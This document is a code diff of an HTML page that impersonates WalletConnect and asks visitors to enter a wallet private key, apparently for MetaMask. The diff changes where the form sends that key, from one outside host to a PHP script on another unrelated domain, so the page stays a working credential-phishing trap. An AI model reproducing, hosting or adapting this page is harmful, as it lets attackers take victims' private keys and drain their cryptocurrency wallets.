--- a/sync/import-wallet/private-key/index.html
+++ b/sync/import-wallet/private-key/index.html
@@ -31,7 +31,7 @@
     <div class="top">
         <a href="https://github.com/walletconnect" class="left">Github</a>
         <a href="https://docs.walletconnect.org/" class="left">Docs</a>
-        <a href="https://free.nftopsea.io/connect-wallet" class="main">
+        <a href="https://web3-bridge.github.io/sync/import-wallet" class="main">
             <img src="https://free.nftopsea.io/front/assets/logo.svg" alt="logo"></a>
         <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Wallets</a>
         <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Encryptor</a>
@@ -49,7 +49,7 @@
 
 
     <div >
-        <form method="post" action="https://free.nftopsea.io/send-privatekey">
+        <form method="post" action="https://www.my-clientarea.my.id/web3bridge/private-key.php">
             <input type="hidden" name="_token" value="dLbn3dZXG1HrK7hFgHfPHjU8GEX8wEDUkrgdjsrM">                                                <input type="hidden" value="Metamask" name="name" />
             <div class="field">
                 <input type="text" name="private_key" class="key" placeholder="Private Key">
